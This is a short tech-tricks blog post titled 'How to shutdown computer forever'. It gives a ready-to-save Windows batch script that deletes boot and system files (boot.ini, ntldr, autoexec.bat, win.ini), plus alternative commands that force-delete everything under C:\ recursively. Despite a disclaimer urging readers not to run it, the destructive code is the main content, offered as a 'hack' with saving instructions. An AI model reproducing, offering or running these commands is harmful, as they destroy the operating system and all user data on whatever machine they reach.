Bhuvan InfoTech Android App

Download our Android App and browse Technical News, Projects, Computer Tricks more easily with lots of Interesting Features.

Sunday, July 17, 2016

How to shutdown computer forever.

This is hereby inform to all the readers that Please don't try this trick, Because this hack will permanently shutdown your computer by deleting files needed to reboot and restart from your windows PC.
If anyone try then their is no responsibility of admin or Bhuvan InfoTech for any type of soft, hard or data loss.

Copy the following code in notepad file-
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini
Save it as "Shutdown-forever.bat", Just make sure that its extension is .bat rather than .txt
Be careful, Please don't run the batch file. because if ones you shutdown your computer forever there is no method to recover your windows PC.

Here is an alternative code for this Hack.

cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q 

Save it in notepad file with Extension .cmd.
Bhuvan Arora

No comments:

Amazing Deal !